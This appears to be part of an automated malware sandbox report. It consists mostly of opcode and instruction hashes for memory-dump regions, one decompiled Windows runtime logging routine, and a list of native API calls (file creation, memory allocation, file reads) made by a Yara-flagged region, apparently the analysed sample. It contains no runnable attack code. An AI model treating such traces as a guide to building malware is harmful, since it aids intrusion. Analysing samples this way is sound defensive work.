                                                                      • API String ID:
                                                                      • Opcode ID: 7dd3a5078095f35eca92646a1fdf0abd75a8cabf5e36c255866c0906cad740e6
                                                                      • Instruction ID: 70ae5955d2cd9b994136cc6a6bd663c9aa8c04859bdd1f6641be4a8f9d74a27b
                                                                      • Opcode Fuzzy Hash: 7dd3a5078095f35eca92646a1fdf0abd75a8cabf5e36c255866c0906cad740e6
                                                                      • Instruction Fuzzy Hash: 09900269321000020285A569064450B0445A7D6391391C025F14065D0CC6618865A361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 039c539fd119558a76ebd7506ad3990fe2eae0f293faee4187cb0caaced24b57
                                                                      • Instruction ID: a2b104b94d9160774cf3132984c2b982a9310a160bd42aa155c31c3af8f33c2a
                                                                      • Opcode Fuzzy Hash: 039c539fd119558a76ebd7506ad3990fe2eae0f293faee4187cb0caaced24b57
                                                                      • Instruction Fuzzy Hash: EA9002A530140403D28065694844607000597D0342F51C021A2054595E8A698C51B175
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0f33373cca3e0cdc8fb9098bc33cd5513dba18b68b99e2a1c01c1f676f854b3
                                                                      • Instruction ID: f2fd822791b6a01ae21b6ab442b06185d810bf162d4e56d9469bb2d0192dad71
                                                                      • Opcode Fuzzy Hash: e0f33373cca3e0cdc8fb9098bc33cd5513dba18b68b99e2a1c01c1f676f854b3
                                                                      • Instruction Fuzzy Hash: 1C90026530144442D28062694844B0F410597E1342F91C029A4146594CC9558855A761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 198198536b54020ff739ff1daa9fcd9929c8497be6f1fd6d1ee386e7c08112b6
                                                                      • Instruction ID: a31c20466f91fb8518deab1cb752f62fb5c8d2c00e1d6db3e8ff926cb7949f39
                                                                      • Opcode Fuzzy Hash: 198198536b54020ff739ff1daa9fcd9929c8497be6f1fd6d1ee386e7c08112b6
                                                                      • Instruction Fuzzy Hash: 0F90027530100842D24061694444B46000597E0341F51C026A0114694D8655C851B561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99aecfa6c5031749b943f0518642f659bde2d6b50977f3aab02d58d34f1fd479
                                                                      • Instruction ID: 25159b2f1e3f93a711d37580008ae5727f58341129f5fff04a2ddd65b72ccfcf
                                                                      • Opcode Fuzzy Hash: 99aecfa6c5031749b943f0518642f659bde2d6b50977f3aab02d58d34f1fd479
                                                                      • Instruction Fuzzy Hash: BC90027530140402D24061694848747000597D0342F51C021A5154595E86A5C891B571
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3e1db4b53dd2f4e74e86572f1d1ade85f2326ff2a191581d0b4d2e21230796d
                                                                      • Instruction ID: 92d0c3dddb4c53bbd0af951cf382337a264bd46eae015d3e6e328d050631ef92
                                                                      • Opcode Fuzzy Hash: a3e1db4b53dd2f4e74e86572f1d1ade85f2326ff2a191581d0b4d2e21230796d
                                                                      • Instruction Fuzzy Hash: 0790027570500802D29071694454746000597D0341F51C021A0014694D87958A55B6E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc9eefd739988cb5f169d9659d7b0e2086d2364558d178cccedb075d2f3945d8
                                                                      • Instruction ID: 26e816479b1a769226a71fa182ed1fd18f2d7cc97382a72027869105ccc7e8f1
                                                                      • Opcode Fuzzy Hash: fc9eefd739988cb5f169d9659d7b0e2086d2364558d178cccedb075d2f3945d8
                                                                      • Instruction Fuzzy Hash: F890027530504842D28071694444A46001597D0345F51C021A00546D4D96658D55F6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ac5749bab94b8e8dc3efd648bce76a87a3196a041d9fd1d2f28ca8f9f7c407e4
                                                                      • Instruction ID: 306fdddda10b7708a754be9709a80c5b1f5fdd6195a96ef02a1ff9a34215d0fa
                                                                      • Opcode Fuzzy Hash: ac5749bab94b8e8dc3efd648bce76a87a3196a041d9fd1d2f28ca8f9f7c407e4
                                                                      • Instruction Fuzzy Hash: 1C90027530144002D2807169848460B5005A7E0341F51C421E0415594C86558856E261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cbc0cb789e19b5669a721bc8a0d666771a1054fa8ed888f542a2b11fef75bdb8
                                                                      • Instruction ID: d88346592c2bc2e5d63076665f7ab5c2b04697c3a2c5c8728d13d5d0978a2df9
                                                                      • Opcode Fuzzy Hash: cbc0cb789e19b5669a721bc8a0d666771a1054fa8ed888f542a2b11fef75bdb8
                                                                      • Instruction Fuzzy Hash: 1C90026570500402D28071695458706001597D0341F51D021A0014594DC6998A55B6E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 85c59540935ae9d81cf45e5a5af5e96553f7b2443d76db0f55b00f16d769e7c0
                                                                      • Instruction ID: d03eaf5341150d8741fa6097fe9defc73e5e10fbd0e7fac6561da8ac93da2caa
                                                                      • Opcode Fuzzy Hash: 85c59540935ae9d81cf45e5a5af5e96553f7b2443d76db0f55b00f16d769e7c0
                                                                      • Instruction Fuzzy Hash: 1990026534100802D280716984547070006D7D0741F51C021A0014594D86568965B6F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2d6b2b350ceb8f801df1d4011f044b4c8841c87c3ce0994c5d28d6764b05ee45
                                                                      • Instruction ID: 4f3fba1f12d5b86a6adc09748472f13091af939f9f9724531ac59252c27a24a8
                                                                      • Opcode Fuzzy Hash: 2d6b2b350ceb8f801df1d4011f044b4c8841c87c3ce0994c5d28d6764b05ee45
                                                                      • Instruction Fuzzy Hash: 46900275301000529640A6A95844A4A410597F0341B51D025A4004594C85948861A161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 493f17ed834d3242bf4c45c1971c0e93bd78298ae30ebba686f700274f637621
                                                                      • Instruction ID: 32a58c8393d4bf14a90242acfa771660a006991203439bbed160fa034e729507
                                                                      • Opcode Fuzzy Hash: 493f17ed834d3242bf4c45c1971c0e93bd78298ae30ebba686f700274f637621
                                                                      • Instruction Fuzzy Hash: 9390027530100403D24061695548707000597D0341F51D421A0414598DD6968851B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8f3cbc885204d218efa5d19087c3b6f5be40dfd3ad1846483e64e07ee84dc36
                                                                      • Instruction ID: 4365318bbcec634f908b7ee491300083e6cb3d4e5336b5ec80b0b8fce1e2c39f
                                                                      • Opcode Fuzzy Hash: d8f3cbc885204d218efa5d19087c3b6f5be40dfd3ad1846483e64e07ee84dc36
                                                                      • Instruction Fuzzy Hash: 0490047530504443D340757D544CF070005D7D0345F51D031F10545D5DC775CC51F171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0db6a3fe53ef69997f0ad1dc32989f00e1b1d0bb1b9c004e022ebed83aec28d
                                                                      • Instruction ID: 0462f377e9076efbc1469e49279942be19fc086e479e1333778e28e1099be3b8
                                                                      • Opcode Fuzzy Hash: d0db6a3fe53ef69997f0ad1dc32989f00e1b1d0bb1b9c004e022ebed83aec28d
                                                                      • Instruction Fuzzy Hash: 8690027930504442D64065695844A87000597D0345F51D421A04145DCD86948861F161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: 6f809e5f8a2415898a93a880bdf8bf5f36c4babdb3f16e144d061bc7f7a6759b
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00A8FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E00A3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E00A85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E00A85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}










                                                                      0x00a8fdda
                                                                      0x00a8fde2
                                                                      0x00a8fde5
                                                                      0x00a8fdec
                                                                      0x00a8fdfa
                                                                      0x00a8fdff
                                                                      0x00a8fe0a
                                                                      0x00a8fe0f
                                                                      0x00a8fe17
                                                                      0x00a8fe1e
                                                                      0x00a8fe19
                                                                      0x00a8fe19
                                                                      0x00a8fe19
                                                                      0x00a8fe20
                                                                      0x00a8fe21
                                                                      0x00a8fe22
                                                                      0x00a8fe25
                                                                      0x00a8fe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A8FDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A8FE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A8FE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: d9ba31fddcc686f249622c3180501812b81d4d66558515592a7e10b1b9890266
                                                                      • Instruction ID: 3abf52243d4c6e49ce00e09f1b107d0deed4032f8231c4589ff249e88806b6eb
                                                                      • Opcode Fuzzy Hash: d9ba31fddcc686f249622c3180501812b81d4d66558515592a7e10b1b9890266
                                                                      • Instruction Fuzzy Hash: EAF0F632600641BFDA212B56DD02F23BB6AEB84730F244315F668565E1DA62FC6097F0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,030B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030B820D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction ID: 55d1f47f0167f68d75c17896fb8386b0d2ea0a1887a0c6aec7c639296c245173
                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction Fuzzy Hash: 86F0B2B2201208ABCB08CF88DC84EEB77ADAF8C754F158648FA0D97240C630E811CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030A2D11,00002000,00003000,00000004), ref: 030B83D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: ada0acba0ca464633c8ad75400b816a1c9c3e5a38585439bfd9830d75e9834c8
                                                                      • Instruction ID: 57307cd2942ee50fb55505e152fb6e340bc6ec37121dd239dce0186c177ab480
                                                                      • Opcode Fuzzy Hash: ada0acba0ca464633c8ad75400b816a1c9c3e5a38585439bfd9830d75e9834c8
                                                                      • Instruction Fuzzy Hash: 04011AB6200208AFCB04DF98DC81EEB77ADEF88650F108909FE0897251D630E811CBF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(030B3D52,5E972F59,FFFFFFFF,030B3A11,?,?,030B3D52,?,030B3A11,FFFFFFFF,5E972F59,030B3D52,?,00000000), ref: 030B82B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction ID: dad3f7c271c48626b3b98f42348168e36ebbd2e8456916e9ad850c4d9454b988
                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction Fuzzy Hash: FAF0A4B6200208ABCB14DF89DC80EEB77ADEF8C754F158649BA1D97251DA30E811CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(030B3D52,5E972F59,FFFFFFFF,030B3A11,?,?,030B3D52,?,030B3A11,FFFFFFFF,5E972F59,030B3D52,?,00000000), ref: 030B82B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: cd0ed492f327977d985f7d6348a07295b6a6030c34de41e8bc7f86ce4d19be51
                                                                      • Instruction ID: 42fc99b1fd133ebb48ced3eaa4eeeee23b33303244992fb46b7c4a635e625e27
                                                                      • Opcode Fuzzy Hash: cd0ed492f327977d985f7d6348a07295b6a6030c34de41e8bc7f86ce4d19be51
                                                                      • Instruction Fuzzy Hash: BBF01DB6200144ABCB04DF98D884CEB77ADEF8C254B15878DFA5C97251C630E855CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030A2D11,00002000,00003000,00000004), ref: 030B83D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                      • Instruction ID: 6ec161201bf57febc5393bc4b10f75aa1943a6cb23c6f38a41089bbd6fb15f12
                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                      • Instruction Fuzzy Hash: 3FF015B6200208ABCB14DF89CC80EEB77ADEF88650F118549FE0897241C630F810CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(030B3D30,?,?,030B3D30,00000000,FFFFFFFF), ref: 030B8315
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction ID: 56f4d9acff00597e659e69f005665512211dd013fc1f55e618cfae60cfb0b199
                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction Fuzzy Hash: 2ED012762003146BD710EF98CC45ED7776CEF44650F154455BA185B241C530F90086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d1b567eb456297b3c4cf4548c5fa99e458133e3054abfefd9ecea704e669b7aa
                                                                      • Instruction ID: 1378c4b63bba19b89d6762e32dd5f3848854db9916259e5b90746d707959ea59
                                                                      • Opcode Fuzzy Hash: d1b567eb456297b3c4cf4548c5fa99e458133e3054abfefd9ecea704e669b7aa
                                                                      • Instruction Fuzzy Hash: 4D900265291000032115A55D07045070096ABD5395751C021F1006551CD661D8657161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d649fa007d5652054ec06a09fc84ca166428d3bccfd085ac4eadb302fc12d348
                                                                      • Instruction ID: c30ef066176dc5d58f0b183197f65d529cfb16ff52de621ad5461876882de101
                                                                      • Opcode Fuzzy Hash: d649fa007d5652054ec06a09fc84ca166428d3bccfd085ac4eadb302fc12d348
                                                                      • Instruction Fuzzy Hash: FA9002A1282000036115715D4414616405AABE0245F51C021E1005591DC565D8957165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f292a215174fd4f032968f09e828cb61908ba0bdc714b61acda64a3e18b20456
                                                                      • Instruction ID: 6f107de8178d3b2a8cfa0f468e7fc8d7530060dea108abe643a36b65c07b3640
                                                                      • Opcode Fuzzy Hash: f292a215174fd4f032968f09e828cb61908ba0bdc714b61acda64a3e18b20456
                                                                      • Instruction Fuzzy Hash: FC90027128504842F150715D4404A460065ABD0349F51C011A0055695D9665DD59B6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f1d1c48c383f2baacdcc01131cb52cb960b12174ea0102ddf5065f4b30eef34e
                                                                      • Instruction ID: 21ed0b86df4bc4c6e2a1224dbcb4c6d00c000897e55d6cca7c89b9aaacf6445f
                                                                      • Opcode Fuzzy Hash: f1d1c48c383f2baacdcc01131cb52cb960b12174ea0102ddf5065f4b30eef34e
                                                                      • Instruction Fuzzy Hash: D090027128100802F190715D440464A0055ABD1345F91C015A0016655DCA55DA5D77E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a6e1d0b0667a8b0d4a9c3202a38871ec3c658874ab41fcbc27b1808e95ebcff3
                                                                      • Instruction ID: 344f4862e266c09336cc6c6409f27a7f242cb6df2d44d6e14f7bedfdd35118a7
                                                                      • Opcode Fuzzy Hash: a6e1d0b0667a8b0d4a9c3202a38871ec3c658874ab41fcbc27b1808e95ebcff3
                                                                      • Instruction Fuzzy Hash: FD90027128100842F110615D4404B460055ABE0345F51C016A0115655D8655D8557561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3856e5bfe8d061e780ae389cbae25e14388656e2cca1fc65d59cdfb67f0f2f7d
                                                                      • Instruction ID: a8df5bf45ed850242cb8e87f4eac8524afb24262160c670e868c05278f241883
                                                                      • Opcode Fuzzy Hash: 3856e5bfe8d061e780ae389cbae25e14388656e2cca1fc65d59cdfb67f0f2f7d
                                                                      • Instruction Fuzzy Hash: 7C90027128108802F120615D840474A0055ABD0345F55C411A4415659D86D5D8957161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0a8776b651fc3a3e3e588426aef09ce07876fdaf061893dc6349e9c9c1d0eedd
                                                                      • Instruction ID: 0d79cfe548bc9769c0042d0beaa9baefc3dac8c547dc8380603e82d02d2aecc3
                                                                      • Opcode Fuzzy Hash: 0a8776b651fc3a3e3e588426aef09ce07876fdaf061893dc6349e9c9c1d0eedd
                                                                      • Instruction Fuzzy Hash: A590027128100402F110659D54086460055ABE0345F51D011A5015556EC6A5D8957171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f4c6aae166abb4aa9d62c77798228dba92db7e34ddbfbbdb0723bce2d3ff49bf
                                                                      • Instruction ID: c09084bf739df3fc4d0334ab2c881e4756234e951e4d892e2c17bd0dd7e3992c
                                                                      • Opcode Fuzzy Hash: f4c6aae166abb4aa9d62c77798228dba92db7e34ddbfbbdb0723bce2d3ff49bf
                                                                      • Instruction Fuzzy Hash: 7A90027139114402F120615D84047060055ABD1245F51C411A0815559D86D5D8957162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b2e77e58497389a3548e50070291c7cec2f289ac9c7a92d9b294bca3ec375654
                                                                      • Instruction ID: b3170c45fadf179fad16bdba41a9dfbb7913112525e7e8bcc0dec4c88b365795
                                                                      • Opcode Fuzzy Hash: b2e77e58497389a3548e50070291c7cec2f289ac9c7a92d9b294bca3ec375654
                                                                      • Instruction Fuzzy Hash: 9190026929300002F190715D540860A0055ABD1246F91D415A0006559CC955D86D7361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
